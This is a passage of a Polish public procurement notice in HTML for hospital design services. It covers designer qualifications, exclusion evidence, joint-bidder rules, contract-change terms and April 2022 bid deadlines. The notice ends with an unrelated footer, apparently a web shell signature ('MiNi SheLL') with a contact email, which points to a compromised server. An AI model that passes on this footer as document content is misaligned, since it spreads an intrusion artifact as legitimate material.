uprawnienia budowlane do projektowania bez ograniczeń w<br/>specjalności konstrukcyjno-budowlanej bez ograniczeń,<br/>c) projektant instalacji sanitarnych - co najmniej jedną osobą, która posiada uprawnienia budowlane do projektowania w<br/>specjalności instalacyjnej w zakresie instalacji i sieci wod-kan, c.o, wentylacyjnych i gazowych bez ograniczeń,<br/>d) projektant sieci i instalacji elektrycznych - co najmniej jedną osobą, która posiada uprawnienia budowlane do<br/>projektowania w specjalności instalacyjnej w zakresie instalacji elektrycznych i elektroenergetycznych bez ograniczeń,<br/>e) projektant sieci i instalacji telekomunikacyjnych - co najmniej jedną osobą, która posiada uprawnienia budowlane do<br/>projektowania w specjalności instalacyjnej w zakresie instalacji telekomunikacyjnych bez ograniczeń,<br/>Uwaga:<br/>Przez uprawnienia budowlane należy rozumieć uprawnienia budowlane wydane zgodnie z<br/>przepisami ustawy z dnia 7 lipca 1994 r. Prawo budowlane oraz przepisami rozporządzenia Ministra Infrastruktury i Rozwoju<br/>z dnia 29 kwietnia 2019 r. w sprawie przygotowania zawodowego do wykonywania samodzielnych funkcji technicznych w<br/>budownictwie lub odpowiadające im ważne uprawnienia wydane na podstawie wcześniej obowiązujących przepisów lub<br/>odpowiadające im ważne uprawnienia budowlane, które zostały wydane obywatelom państw Europejskiego Obszaru<br/>Gospodarczego oraz Konfederacji Szwajcarskiej z zastrzeżeniem art. 12a oraz innych przepisów ustawy Prawo budowlane<br/>oraz ustawy z dnia 22 grudnia 2015 r. o zasadach uznawania kwalifikacji zawodowych nabytych w państwach<br/>członkowskich Unii Europejskiej. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Na potwierdzenie braku podstaw wykluczenia o których mowa w art. 108 ust.1 pkt. 1-6 i art. 109 ust.1 pkt.4,5 i 7 p.z.p:<br/>1. Oświadczenie wykonawcy o aktualności informacji zawartych w oświadczeniu, o którym mowa w art. 125 ust. 1 p.z.p. w zakresie<br/>odnoszącym się do podstaw wykluczenia wskazanych w art. 108 ust. 1 pkt 1-6 p.z.p. i art.109 ust.1 pkt. 5 i 7;<br/>2. Odpis lub informacja z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej, w<br/>zakresie art. 109 ust. 1 pkt 4 p.z.p., sporządzonych nie wcześniej niż 3 miesiące przed jej złożeniem, jeżeli odrębne przepisy<br/>wymagają wpisu do rejestru lub ewidencji;<br/>Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza granicami Rzeczypospolitej Polskiej:<br/>- zamiast dokumentów, o których mowa w pkt 2 składa dokument lub dokumenty wystawione w kraju, w którym wykonawca ma<br/>siedzibę lub miejsce zamieszkania, potwierdzające, że nie otwarto jego likwidacji, nie ogłoszono upadłości, jego aktywami nie<br/>zarządza likwidator lub sąd, nie zawarł układu z wierzycielami, jego działalność gospodarcza nie jest zawieszona ani nie znajduje się on w innej tego rodzaju sytuacji wynikającej z podobnej procedury przewidzianej w przepisach miejsca wszczęcia tej procedury - wystawione nie wcześniej niż 3 miesiące przed jego złożeniem.<br/>Jeżeli w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa wyżej,<br/>zastępuje się je odpowiednio w całości lub w części dokumentem zawierającym odpowiednio oświadczenie wykonawcy, ze<br/>wskazaniem osoby albo osób uprawnionych do jego reprezentacji, lub oświadczenie osoby, której dokument miał dotyczyć, złożone<br/>pod przysięgą, lub, jeżeli w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania nie ma przepisów o oświadczeniu pod przysięgą, złożone przed organem sądowym lub administracyjnym, notariuszem, organem samorządu zawodowego lub gospodarczego, właściwym ze względu na siedzibę lub miejsce zamieszkania wykonawcy. Wymagania dotyczące terminu<br/>wystawienia dokumentów lub oświadczeń są analogiczne jak wyżej.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1) wykonawca składa sporządzony według wzoru załącznika nr 6 do SWZ wykaz usług wykonanych, w okresie ostatnich 3 lat, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których usługi zostały wykonane, oraz załączeniem dowodów określających, czy te usługi zostały wykonane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego usługi zostały wykonane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów – oświadczenie wykonawcy;<br/>2) wykonawca składa sporządzony według wzoru załącznika nr 7 do SWZ wykaz osób, skierowanych przez wykonawcę do realizacji<br/>zamówienia, w szczególności odpowiedzialnych za świadczenie usług, wraz z informacjami na temat ich kwalifikacji zawodowych,<br/>uprawnień, doświadczenia i wykształcenia niezbędnego do wykonywania zamówienia, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami.</span> </h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> - Formularzu Ofertowy – zgodnie z załącznikiem nr 2 do SWZ , dołączyć opis doświadczenia projektanta ocenianego w<br/>kryterium jakość – zgodnie z załącznikiem nr 2a do SWZ<br/>Wraz z ofertą Wykonawca jest zobowiązany złożyć:<br/>- oświadczenie o którym mowa w Rozdziale XIII pkt. 1 SWZ – wg wzoru załącznik nr 3 do SWZ<br/>- Pełnomocnictwo upoważniające do złożenia oferty, o ile ofertę składa pełnomocnik;<br/>- Pełnomocnictwo dla pełnomocnika do reprezentowania w postępowaniu Wykonawców wspólnie ubiegających się o<br/>udzielenie zamówienia - dotyczy ofert składanych przez Wykonawców wspólnie ubiegających się o udzielenie zamówienia o których mowa w Rozdziale XIV SWZ.<br/>- Oświadczenia podmiotu udostępniającego zasoby, o którym mowa w Rozdziale XIII pkt 4.2.1 SWZ (jeżeli dotyczy) wg<br/>wzoru załącznik nr 4 do SWZ;<br/>- Oświadczenie konsorcjum/ spółki cywilnej z którego wynika, które usługi wykonają poszczególni wykonawcy - w przypadku<br/>wykonawców wspólnie ubiegających się o udzielenie zamówienia – wg. wzoru załącznik nr 5 do SWZ; <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Wykonawcy występujący wspólnie ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie<br/>zamówienia albo do reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. Dokument<br/>pełnomocnictwa powinien być podpisany przez wszystkich wykonawców. Pełnomocnictwo należy dołączyć do oferty.<br/>Pełnomocnictwo winno być sporządzone do oferty w postaci elektronicznej.<br/>2. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, oświadczenie, o których mowa w<br/>Rozdziale XIII pkt. 1 SWZ, składa każdy z wykonawców. Oświadczenia te potwierdzają brak podstaw wykluczenia.<br/>3. W odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia wykonawcy wspólnie<br/>ubiegający się o udzielenie zamówienia mogą polegać na zdolnościach tych z wykonawców, którzy wykonają usługi do<br/>realizacji których te zdolności są wymagane;<br/>4. W przypadku o którym mowa w pkt. 4 wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają<br/>odpowiednio do oferty oświadczenie, z którego wynika, które usługi wykonają poszczególni wykonawcy.<br/>5. Spełnienie warunków udziału w postępowaniu, dotyczących zdolności technicznej lub zawodowej o których mowa w pkt.<br/>XI pkt.1.2.4 SWZ, Wykonawcy mogą spełniać łącznie ( co najmniej jeden z Wykonawców albo wszyscy Wykonawcy łącznie).<br/>6. Oświadczenia i dokumenty o których mowa w Rozdziale XIII pkt 1 i 3.1 składa każdy z Wykonawców wspólnie ubiegających się o zamówienie. Dokumenty te potwierdzają spełnienie warunków udziału w postępowaniu oraz brak podstaw wykluczenia w zakresie, w którym każdy z wykonawców wykazuje spełnienie warunków udziału w postępowaniu oraz brak podstaw do wykluczenia. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. Wszelkie zmiany i uzupełnienia treści Umowy mogą być dokonane za zgodą obu Stron wyrażoną na piśmie pod rygorem<br/>nieważności takiej zmiany, chyba, że co innego wynika z postanowień Umowy.<br/>2. Niedopuszczalna jest istotna zmiana Umowy w rozumieniu art. 454 ustawy - Prawo zamówień publicznych. Zamawiający<br/>może odstąpić od Umowy, jeżeli dokonano zmiany Umowy z naruszeniem art. 454 i art. 455 ww. ustawy, co sprawia, że<br/>Wykonawca może żądać wyłącznie wynagrodzenia należnego za wykonanie części Umowy.<br/>3. Zamawiający dopuszcza możliwość zmiany Umowy w przypadkach określonych w art. 455 ust. 1 pkt 2 – 4 i ust. 2 ustawy<br/>p.z.p oraz przewiduje zgodnie z art. 455 ust. 1 pkt 1) ustawy p.z.p., możliwość zmiany postanowień Umowy określając<br/>następujący rodzaj, zakres oraz warunki zmian postanowień Umowy:<br/>3.1 zmiana postanowień umowy w zakresie ceny zgodnie z postanowieniami § 9 pkt.9-11 umowy;<br/>3.2 zmian terminu realizacji zamówienia zgodnie z postanowieniami § 7 pkt.2-3 umowy;<br/>3.3 zmian w zakresie: osób kluczowych dla realizacji zamówienia o których mowa w § 13 pkt.1 umowy, zgodnie z<br/>postanowieniami § 13 pkt.2-6 umowy;<br/>3.4 zatrudnienia podwykonawców (w przypadku, gdy Wykonawca oświadczył, iż wykona Umowę osobiście – w zakresie<br/>zgodnym ze SWZ),<br/>3.5 zmiany osobowej podwykonawców oraz zakresu podwykonawstwa w warunkach opisanych w §6 umowy (w przypadku,<br/>gdy Wykonawca wykonuje umowę przy pomocy podwykonawców),<br/>3.6 zmiany sposobu i zakresu wykonania Przedmiotu Umowy w przypadku zmiany obowiązujących przepisów prawa<br/>istotnych dla realizacji zamówienia powodujących konieczność: przyjęcia innych rozwiązań technicznych, technologicznych,<br/>materiałowych lub uzyskania innych bądź dodatkowych decyzji, uzgodnień, zezwoleń, ekspertyz lub innych aktów<br/>administracyjnych niezbędnych w związku z projektowaną inwestycją lub uwzględnienia nowych przepisów prawa w<br/>zakresie formy, zakresu, sposobu wykonania dokumentacji projektowo – kosztorysowej, których uzyskanie nie było<br/>konieczne na etapie składania ofert, jeżeli wprowadzane zmiany będą miały wpływ na koszty lub termin wykonania<br/>zamówienia przez Wykonawcę,<br/>3.7 zmiana umowy w związku z istnieniem/zaistnieniem epidemii/pandemii, w tym występowania ograniczeń i obostrzeń<br/>związanych ze stanem zagrożenia epidemiologicznego lub innej nadzwyczajnej sytuacji spowodowanej występowaniem<br/>choroby zakaźnej wywołanej wirusem SARS-CoV-2 lub &#34;COVID-19”,<br/>3.8 zmiana umowy w związku z wystąpieniem warunków siły wyższej, tj. zaistnieniem klęski żywiołowej, jak huragany,<br/>powodzie, trzęsienie ziemi, bunty, niepokoje, strajki, spowodowane przez osoby inne niż pracownicy Wykonawcy i jego<br/>podwykonawców.<br/>4. Zamawiający uprawniony jest do żądania od Wykonawcy dokumentów i oświadczeń w celu dokonania weryfikacji<br/>przyczyn i zasadności zmian Umowy. W przypadku złożenia wniosku o dokonanie zmiany, strona wnioskująca przedłoży<br/>założenia dotyczące dokonania wnioskowanej zmiany. Założenia dotyczące dokonania zmiany powinny prezentować<br/>wszelkie aspekty zmiany w odniesieniu do zakresu oraz trybu i warunków zmiany umowy, a w szczególności założenia<br/>dotyczące danej zmiany powinny obejmować wskazanie podstawy prawnej jej wprowadzenia, w tym w szczególności<br/>prawne i faktyczne uzasadnienie dopuszczalności zmiany w danym przypadku. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-04-26 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">na Platformie pod adresem https://szpitalodrodzenie.ezamawiajacy.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-04-26 10:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2022-05-25</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com